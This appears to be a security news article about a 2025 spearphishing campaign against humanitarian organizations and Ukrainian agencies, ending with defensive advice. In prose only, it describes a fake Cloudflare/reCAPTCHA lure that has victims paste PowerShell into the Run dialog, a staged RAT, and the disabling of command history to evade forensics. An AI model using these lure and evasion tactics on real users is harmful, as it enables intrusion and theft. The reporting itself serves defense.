In early October 2025, cybersecurity researchers uncovered a highly sophisticated spearphishing campaign targeting humanitarian organizations and Ukrainian government agencies. The attackers employed weaponized PDF attachments and counterfeit Cloudflare verification pages to distribute a WebSocket-based remote access trojan (RAT).
Targeted Entities and Deceptive Tactics
The campaign specifically targeted members of the International Red Cross, Norwegian Refugee Council, UNICEF, and regional government administrations across Ukraine. Attackers sent emails impersonating the Ukrainian President’s Office, lending credibility to their malicious communications.
Upon opening the malicious PDF and clicking the embedded link, recipients were redirected to a convincing fake Cloudflare DDoS protection gateway. This counterfeit page mimicked legitimate security verification processes, deceiving users into believing they were undergoing standard security checks.
Infrastructure and Operational Security
The attackers registered the domain zoomconference.app to mimic a legitimate Zoom conference service, hosting their malicious infrastructure on Russian-owned VPS servers located in Finland. Demonstrating advanced operational security, the threat actors maintained their infrastructure for only 24 hours before shutting down public-facing domains while preserving backend command-and-control servers. This approach indicates meticulous planning and a high level of sophistication.
The campaign’s timeline reveals that operations began in March 2025, with SSL certificates issued in September, suggesting extensive preparation before the October execution.
ClickFix Infection Mechanism and Multi-Stage Payload Delivery
Central to the campaign’s effectiveness is the implementation of the ClickFix social engineering technique, increasingly adopted by threat actors since mid-2024.
After the fake Cloudflare page loads, victims encounter a simulated reCAPTCHA interface with an I’m not a robot checkbox. Clicking this checkbox triggers a popup containing instructions written in Ukrainian, directing users to copy a token and paste it into the Windows Run dialog using the keyboard shortcut Windows+R. This seemingly innocuous action executes malicious PowerShell code, initiating the infection chain.
The underlying mechanism relies on a JavaScript function named copyToken() that downloads and executes a PowerShell script.
The attackers distributed three stages of payloads:
1. First Stage: A heavily obfuscated 500KB PowerShell downloader that obscured simple download functionality through massive code obfuscation techniques.
2. Second Stage: Comprehensive system reconnaissance, collecting computer names, domain information, usernames, process IDs, and hardware identifiers through system UUID retrieval. This data was encrypted using a hardcoded XOR key before transmission.
3. Final Payload: A WebSocket-based remote access trojan capable of receiving arbitrary commands encoded in Base64-formatted JSON messages. This lightweight backdoor connected to remote servers and executed commands using PowerShell’s Invoke-Expression cmdlet, granting attackers complete remote command execution capabilities and data exfiltration access.
The malware disabled PowerShell command history logging to prevent forensic analysis, representing a deliberate effort to cover operational tracks while maintaining persistent access to compromised systems.
Implications and Recommendations
This campaign underscores the evolving sophistication of cyber threats targeting humanitarian organizations and government agencies. The use of weaponized PDFs, counterfeit security verification pages, and advanced social engineering tactics highlights the need for heightened vigilance and robust cybersecurity measures.
Organizations are advised to:
– Educate Staff: Conduct regular training sessions to raise awareness about phishing tactics and the importance of verifying the authenticity of emails and attachments.
– Implement Multi-Factor Authentication (MFA): Enhance security by requiring multiple forms of verification before granting access to sensitive systems and data.
– Regularly Update Systems: Ensure that all software and systems are up-to-date with the latest security patches to mitigate vulnerabilities.
– Monitor Network Activity: Utilize advanced threat detection systems to monitor for unusual network activity that may indicate a breach.
– Establish Incident Response Plans: Develop and regularly update incident response plans to ensure a swift and effective response to potential security incidents.
By adopting these measures, organizations can better protect themselves against sophisticated cyber threats and minimize the risk of data breaches and system compromises.
